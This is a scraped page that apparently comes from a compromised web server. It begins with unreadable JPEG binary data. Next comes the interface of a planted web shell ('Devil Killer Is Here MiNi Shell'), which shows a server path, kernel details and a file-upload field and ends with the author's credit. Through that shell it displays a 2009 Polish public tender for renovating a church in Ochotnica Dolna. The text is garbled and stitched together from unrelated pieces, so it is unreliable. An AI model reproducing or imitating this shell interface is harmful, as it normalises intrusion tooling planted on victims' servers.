JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091001/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091001/342146-N-2009.html

<p class="kh_header"><b>Ochotnica Dolna: Remont budynku kościoła p.w. Znalezienia Krzyża Świętego w Ochotnicy Dolnej - etap I (w tym wymiana pokrycia dachowego i modernizacja elementów zagospodarowanie terenu wokół kościoła)</b><br>
<b>Numer ogłoszenia: 342146 - 2009; data zamieszczenia: 01.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Ochotnica Dolna , Osiedle Dłubacze 160, 34-452 Ochotnica Dolna, woj. małopolskie, tel. 018 262 09 10, faks 018 262 09 36.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ochotnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Parafia Rzymsko-Katolicka.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont budynku kościoła p.w. Znalezienia Krzyża Świętego w Ochotnicy Dolnej - etap I (w tym wymiana pokrycia dachowego i modernizacja elementów zagospodarowanie terenu wokół kościoła).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje wykonanie robót konserwatorsko-budowlanych  kościoła  w zakresie :
- robót rozbiórkowych,
- robót ciesielskich (wg technologii obróbki i montażu jak w więźbie oryginalnej .Nie dopuszcza się wbudowania jakichkolwiek elementów drewnach nie okorowanych lub porażonych szkodnikami biologicznymi), 
- impregnacji konstrukcji drewnianych,
- robót blacharskich, 
- obróbek blacharskich (rynny, rury spustowe),
- instalacji odgromowej,
- wymiany pokrycia daszków na ogrodzeniu,
- renowacji ogrodzenia wokół kościoła w zakresie ( robót murarskich, spoinowania, impregnacji powierzchni muru),
- malowania elementów stalowych ogrodzenia,
- dokumentacji fotograficznej robót konserwatorsko-budowlanych.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.23.61-4, 45.21.23.50-4, 45.26.00.00-7, 45.42.20.00-1, 45.31.23.11-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Rozdział 9. Warunki udziału w postępowaniu, opis sposobu dokonywania oceny spełniania tych warunków
1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 pkt. 1-3 ustawy Pzp, tj.:
1) posiadają uprawnienia do wykonywania określonej w przedmiocie zamówienia działalności lub czynności;
odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej,
- aktualna informacja z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art.24, ust. 1, pkt. 4 - 8 ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych,
- aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art.24, ust.1, pkt.9 ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych ,
zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego,
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i
osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia tj.:
a) wykonali w ciągu ostatnich 5 lat przed dniem wszczęciem postępowania o udzielenie
zamówienia tj. dniem 16 września 2009r., a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali co najmniej jedną robotę konserwatorsko-budowlaną (remont, przebudowę, modernizację konstrukcji i pokryć dachowych) odpowiadającą swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia - budynków zaliczanych do klasy 1272 Polskiej Klasyfikacji Obiektów Budowlanych (budynki przeznaczone do sprawowania kultu religijnego i czynności religijnych) lub obiektów budowlanych zaliczanych do klasy 1273 Polskiej Klasyfikacji Obiektów Budowlanych (obiektów budowlanych wpisanych do rejestru zabytków i objętych indywidualną ochroną konserwatorską oraz nieruchomych, archeologicznych dóbr kultury) z  zakresu  odpowiadających  przedsięwzięciu będącemu przedmiotem zamówienia z podaniem ich wartości, przedmiotu oraz daty i miejsca wykonania (wzór stanowi Załącznik Nr 4 do SIWZ). Do wykazu Wykonawca musi również dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie (referencje, protokoły odbioru, itp.),
b) dysponują osobą-osobami posiadającą-posiadającymi uprawnienia do kierowania robotami budowlanymi w specjalnościach: 
1) konstrukcyjno-budowlanej,
2) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.
Wykonawca zobowiązany jest dołączyć do oferty ksero, potwierdzone za zgodność
z oryginałem, takich uprawnień oraz zaświadczenie, wydane przez właściwą izbę
samorządu zawodowego, potwierdzające wpis danej osoby na listę członków właściwej
izby,
c) informacje na temat średniorocznego zatrudnienia pracowników w przeliczeniu na pełne 
etaty  w okresie ostatnich trzech lat, a przypadku gdy okres prowadzenia działalności jest 
krótszy - w tym okresie, w ilości nie mniejszej niż  5  pracowników rocznie (wzór stanowi załącznik nr 7  do SIWZ).
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
tj. posiadają polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 400.000,00 złotych.
4) nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy - Pzp.
2. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły: spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca spełnia wyżej wymienione warunki.
3. Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub, którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie chyba, że mimo ich uzupełnienia konieczne byłoby unieważnienie postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Rozdział 10. Wykaz oświadczeń lub dokumentów potwierdzających spełnianie warunków w niniejszym postępowaniu
Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1, ust 1 - 3 oraz niepodleganiu wykluczeniu na podstawie art.24, ust.1 i 2 
ustawy Pzp - Wykonawca składa oświadczenia, których wzór stanowią Załącznik Nr 8  do niniejszej SIWZ.
1. W celu potwierdzenia, że Wykonawca posiada uprawnienia do określonej działalności
lub czynności oraz nie podlega wykluczeniu na podstawie art. 24, ust 1 - 2 ustawy Pzp:
1) Kserokopia aktualnego odpisu z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, poświadczona za zgodność z oryginałem przez Oferenta.  W przypadku Oferenta będącego Spółką Cywilną obowiązuje załączenie umowy spółki.
2) Kserokopia aktualnej informacji z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art.24, ust. 1, pkt. 4 - 8 ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych - wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, poświadczona za zgodność z oryginałem przez Oferenta.
3) Kserokopia aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art.24, ust.1, pkt.9 ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych - wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, poświadczona za zgodność z oryginałem przez Oferenta.
4) Kserokopie aktualnych zaświadczeń właściwego naczelnika Urzędu Skarbowego, oraz oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert poświadczone  za zgodność z oryginałem przez Oferenta.
5) Ubiegające się o zamówienie publiczne spółki z o.o. muszą przedłożyć uchwałę wspólników upoważniającą  do zaciągnięcia zobowiązania lub umowę spółki, o ile wartość zamówienia dwukrotnie przekracza wartość kapitału spółki ( art.230 Kodeksu Spółek ).
2. W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez
Wykonawcę niezbędnej wiedzy i doświadczenia:
1). Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem
wszczęcia postępowania o udzielenie zamówienia publicznego tj. dniem 16 września 2009r., a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali co najmniej jedną robotę konserwatorsko-budowlaną (remont, przebudowę, modernizację konstrukcji i pokryć dachowych)  odpowiadającą swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia - budynków zaliczanych do klasy 1272 Polskiej Klasyfikacji Obiektów Budowlanych ( budynki przeznaczone do sprawowania kultu religijnego  i czynności religijnych) lub obiektów budowlanych zaliczanych do klasy 1273 Polskiej Klasyfikacji Obiektów Budowlanych (obiektów budowlanych wpisanych do rejestru zabytków i objętych indywidualną ochroną konserwatorską oraz nieruchomych, archeologicznych dóbr kultury) z  zakresu  odpowiadających  przedsięwzięciu będącemu przedmiotem zamówienia z podaniem ich wartości, przedmiotu oraz daty i miejsca wykonania - wzór stanowi Załącznik Nr 4  do niniejszej  SIWZ. Dla każdej pozycji wykazu należy załączyć dokumenty (protokoły odbioru, referencje,itp.) potwierdzające, że roboty te zostały wykonane należycie.
2) Wykaz osób i podmiotów - wzór stanowi Załącznik Nr 5  do niniejszej SIWZ.
3) Dokumenty potwierdzające posiadanie uprawnień budowlanych do kierowania
robotami budowlanymi w specjalnościach: 
a) konstrukcyjno-budowlanej  (dokumenty mogą być przedstawione w postaci kserokopii poświadczonych za zgodność z oryginałem).
b) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, oraz zaświadczenie- zaświadczenia, wydane przez właściwą izbę samorządu zawodowego, potwierdzające wpis danej osoby na listę członków właściwej izby (dokumenty mogą być przedstawione w postaci kserokopii poświadczonych za zgodność z oryginałem).
4. W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez
Wykonawcę potencjału technicznego 
1) Wykaz narzędzi i urządzeń - wzór stanowi Załącznik Nr 6  do niniejszej SIWZ.
5. W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez
Wykonawcę potencjału kadrowego 
1) informacja o średniorocznym zatrudnieniu w latach 2006-2007-2008 - wzór stanowi Załącznik Nr 7  do niniejszej SIWZ.
6. W celu potwierdzenia opisanego przez Zamawiającego warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie
zamówienia:
1) Polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
Przy składaniu ofert przez Wykonawców wspólnie ubiegających się o udzielenie
zamówienia Wykonawcy mogą złożyć jedną wspólną polisę potwierdzającą, że wszyscy Wykonawcy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
7. Kosztorys ofertowy opracowany wg zasad określonych w rozdziale 16 SIWZ - opis sposobu obliczenia ceny.
Wyliczenie wartości robót ma być dokonane w oparciu o Środowiskowe metody kosztorysowania robót budowlanych załączone do Specyfikacji Istotnych Warunków Zamówienia.
 
Zamawiający wymaga aby cena robocizny zgodnie z wzorem podanym  w pkt.3.1. Środowiskowych metod kosztorysowania robót budowlanych była o wartości minimum 9,77  złotych , wg następującego wyliczenia :

       Minimalna stawka płacy zasadniczej wynosi 7,55 złotych/godzinę ( 1.276,00 złotych :    
       169 godzin do przepracowania w 2009 roku = 7,55 złotych/godzinę ).

       Obligatoryjne koszt pochodne do płacy zasadniczej :
       - ubezpieczenie zdrowotne  -  215,53 złotych : 169 godzin = 1,28 złoty-godzinę,                                                  
       - ubezpieczenie emerytalne  - 373,96 złote     : 169 godzin = 2,21 złote na godzinę,                                             
       - ubezpieczenie rentowe       - 114,95 złotych : 169 godzin  = 0,68 złotego na godzinę,                                                           
       - ubezpieczenie chorobowe  -   46,94 złotych :  169 godzin = 0,28 złotego na godzinę,             
     ____________________________________________________

      O g ó ł e m :                                                                              4,45 złote na godzinę

      4,45 złote na godzinę x 50%  = 2,22 złote godzinę                                                                      
     
      7,55 złotych na godzinę + 2,22 złote na godzinę = 9,77 złotych na godzinę.

Oferty o stawce robocizny niższej niż 9,77 złotych na godzinę - stanowią więc czyn nieuczciwej konkurencji.

I. Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski     i poświadczone za zgodność z oryginałem przez osobę uprawnioną do reprezentowania wykonawców składających ofertę wspólną.
II. W przypadku oferty wspólnej wykonawcy ustanawiają pełnomocnika do reprezentowania ich niniejszym postępowaniu albo do reprezentowania ich w postępowaniu  i do zawarcia umowy  w sprawie zamówienia publicznego. 
III. Pełnomocnictwo musi być złożone w oryginale lub w postaci kopii  poświadczonej notarialnie.
IV. Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, jeżeli ze złożonych dokumentów i oświadczeń będzie jednoznacznie wynikało, że spełnia on warunki określone w art. 22 ust. l ustawy opisane powyżej oraz wymagania zamawiającego dotyczące zawartości (treści) tych dokumentów. 
V. Załączniki do SIWZ muszą być wypełnione przez wykonawcę bez wyjątku ściśle według
warunków i postanowień zawartych w SIWZ, bez dokonywania w nich zmian. 
VI. Załączniki dołączone do SIWZ przedstawione są w formie wzoru graficznego. 
VII. Wykonawca może przedstawić załączniki wg własnego układu graficznego, lecz muszą one zawierać wszystkie zapisy i informacje ujęte we wzorach oraz nie powinny zawierać zapisów innych niż wymagane przez zamawiającego. 
VIII. W przypadku, gdy jakakolwiek część wymaganych załączników nie dotyczy wykonawcy wpisuje on nie dotyczy lub postępuje zgodnie z instrukcją wypełniania danego załącznika.	;
IX. Zgodnie z art. 26 ust. 3 ustawy Zamawiający wezwie wykonawców, którzy w określonym terminie nie złożyli wymaganych przez zamawiającego oświadczeń lub dokumentów, o których mowa w art. 25 ust. l ustawy, lub którzy nie złożyli pełnomocnictw, albo którzy nie złożyli pełnomocnictw albo którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty, o których mowa   w art. 25 ust. l ustawy, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlegałaby odrzuceniu albo konieczne byłoby unieważnienie postępowania. 
X. Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane usługi wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert.
XI. Jeżeli wykonawca nie uzupełni lub nie poprawi w określonym przez zamawiającego terminie dokumentów potwierdzających spełnianie warunków udziału w postępowaniu, zostanie wykluczony  z postępowania, a jego oferta zostanie odrzucona na podstawie art. 89,  ust. l,  pkt. 5 ustawy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.malopolska.pl/bip/ochotnica dolna.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Ochotnicy Dolnej 
34-452 Ochotnica Dolna os. Dłubacze 160, p. 11.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2009 godzina 08:45, miejsce: Urząd Gminy w Ochotnicy Dolnej 
34-452 Ochotnica Dolna os. Dłubacze 160, p. 17.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com